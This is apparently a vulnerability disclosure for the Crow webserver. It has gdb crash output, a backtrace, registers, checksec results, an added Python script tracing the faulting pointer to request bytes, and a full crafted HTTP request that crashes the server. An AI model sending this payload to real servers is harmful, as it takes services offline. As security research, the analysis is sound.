Segmentation fault Denial of Service PoC – Crow webserver v0.1 and v0.2

Shodan

Crash

~/Projects/crow/build/examples$ gdb -q helloworld
Reading symbols from helloworld...
(No debugging symbols found in helloworld)
(gdb) run
Starting program: /Projects/crow/build/examples/helloworld 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff7a45700 (LWP 32382)]
(2021-05-09 15:22:13) [INFO    ] Crow/0.1 server is running at 0.0.0.0:18080 using 1 threads
(2021-05-09 15:22:13) [INFO    ] Call `app.loglevel(crow::LogLevel::Warning)` to hide Info level logs.
[New Thread 0x7ffff7244700 (LWP 32383)]

Thread 2 "helloworld" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff7a45700 (LWP 32382)]
__m128i_shift_right (offset=4, 
    value=<error reading variable: Cannot access memory at address 0x5e25262423323160>)
    at ../sysdeps/x86_64/multiarch/varshift.h:27
27    ../sysdeps/x86_64/multiarch/varshift.h: No such file or directory.

Backtrace

(gdb) backtrace
#0  __m128i_shift_right (offset=4, 
    value=<error reading variable: Cannot access memory at address 0x5e25262423323160>)
    at ../sysdeps/x86_64/multiarch/varshift.h:27
#1  __strcspn_sse42 (
    s=0x5e25262423323164 <error: Cannot access memory at address 0x5e25262423323164>, 
    a=<optimized out>) at ../sysdeps/x86_64/multiarch/strcspn-c.c:143
#2  0x00005555555a398e in crow::HTTPParser<crow::Connection<crow::SocketAdaptor, crow::Crow<>> >::on_message_complete(http_parser*) ()
#3  0x00005555555859e9 in http_parser_execute ()
#4  0x00005555555a3ef2 in boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1, crow::Connection<crow::SocketAdaptor, crow::Crow<>>::do_read()::{lambda(boost::system::error_code const&, unsigned long)#1}>::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) ()
#5  0x000055555558754d in boost::asio::detail::scheduler::run(boost::system::error_code&) ()
#6  0x000055555559ba35 in crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}::operator()() const ()
#7  0x000055555559bf4d in std::_Function_handler<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> (), std::__future_base::_Task_setter<std::unique_ptr<std::__future_base::_Result<void>, std::__future_base::_Result_base::_Deleter>, std::thread::_Invoker<std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}> >, void> >::_M_invoke(std::_Any_data const&) ()
#8  0x000055555557ed1d in std::__future_base::_State_baseV2::_M_do_set(std::function<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> ()>*, bool*) ()
#9  0x00007ffff7f9a47f in __pthread_once_slow (once_control=0x5555555c80b8, 
    init_routine=0x7ffff7e7cb80 <__once_proxy>) at pthread_once.c:116
#10 0x0000555555589125 in std::thread::_State_impl<std::thread::_Invoker<std::tuple<std::__future_base::_Async_state_impl<std::thread::_Invoker<std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}> >, void>::_Async_state_impl(std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}>&&)::{lambda()#1}> > >::_M_run() ()
#11 0x00007ffff7e7dd84 in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
#12 0x00007ffff7f91609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#13 0x00007ffff7cbc293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

Registers

(gdb) info registers 
rax            0x5e25262423323160  6783870350354690400
rbx            0x7ffff00019a0      140737219926432
rcx            0x7ffff7d4c650      140737351304784
rdx            0x4                 4
rsi            0x4                 4
rdi            0x5e25262423323164  6783870350354690404
rbp            0x7ffff7a44600      0x7ffff7a44600
rsp            0x7ffff7a44588      0x7ffff7a44588
r8             0x5555555a6080      93824992567424
r9             0x7c                124
r10            0x2000004800000001  2305843318451339265
r11            0x7ffff0000080      140737219920000
r12            0x7ffff7a445e0      140737348126176
r13            0x7ffff7a445f0      140737348126192
r14            0x5e25262423323164  6783870350354690404
r15            0x5555555a6084      93824992567428
rip            0x7ffff7d207f8      0x7ffff7d207f8 <__strcspn_sse42+72>
eflags         0x10206             [ PF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0

Checksec

./checksec.sh --file ~/Projects/crow/build/examples/helloworld
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /home/hayden/Projects/crow/build/examples/helloworld

Payload PoC

GET /12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^
&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./
passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^& HTTP/1.1
Content-Length: 0
Connection: close
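A triage step worth doing on a crash like the one above is to check whether the faulting pointer is made of request bytes. The gdb session shows `__strcspn_sse42` being called from `on_message_complete` with `rdi = 0x5e25262423323164`, and a pointer whose every byte is printable ASCII rarely comes from the allocator or the stack. The script below is an added example, not code from the original post or from the Crow project: it takes the register values and one repeating unit of the request line from this page, renders the register as the 8 bytes it occupies in little-endian memory, and looks for those bytes in a short request line constructed from two copies of the unit (the real PoC line is several kilobytes). The helper names and the two-unit request are assumptions of this example.

```python
import struct

# Values copied from the gdb output on the page: rdi and rax at the SIGSEGV
# inside __strcspn_sse42, and the unit the request line repeats.
RDI_AT_CRASH = 0x5e25262423323164
RAX_AT_CRASH = 0x5e25262423323160
PAYLOAD_UNIT = "12#$&%^&^(-=0p[;,./passwd/id"


def register_as_bytes(value: int) -> bytes:
    """Render a 64-bit register as the 8 bytes it occupies in memory.
    x86-64 is little-endian, so the low byte of the value comes first."""
    return struct.pack("<Q", value)


def printable_fraction(data: bytes) -> float:
    """Share of bytes that are printable ASCII (0x20..0x7e)."""
    printable = sum(1 for b in data if 0x20 <= b < 0x7F)
    return printable / len(data)


def find_in_request(data: bytes, request_line: str) -> int:
    """Offset of the decoded register bytes inside the request line, or -1."""
    return request_line.encode("ascii").find(data)


def triage(value: int, request_line: str) -> dict:
    """Summarise whether a register value looks like attacker-supplied text."""
    raw = register_as_bytes(value)
    return {
        "ascii": raw.decode("ascii", errors="replace"),
        "printable_fraction": printable_fraction(raw),
        "offset_in_request": find_in_request(raw, request_line),
    }


def build_request_line(units: int = 2) -> str:
    """Constructed stand-in for the page's multi-kilobyte request line."""
    return "GET /" + PAYLOAD_UNIT * units + " HTTP/1.1"


if __name__ == "__main__":
    request = build_request_line()
    for name, reg in (("rdi", RDI_AT_CRASH), ("rax", RAX_AT_CRASH)):
        print(name, triage(reg, request))
```

Run as-is, `rdi` decodes to `d12#$&%^`, which is found in the constructed request line at offset 32 (the `d` of `/id` followed by the start of the next unit), so the string pointer `strcspn` received was taken from request data rather than from a valid C string. `rax` differs from `rdi` only in its low nibble (`0x60` against `0x64`, matching the `offset=4` in frame #0) and decodes to a string that is not in the request, which is consistent with it being the 16-byte-aligned copy the SSE4.2 routine works on rather than a second controlled pointer.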
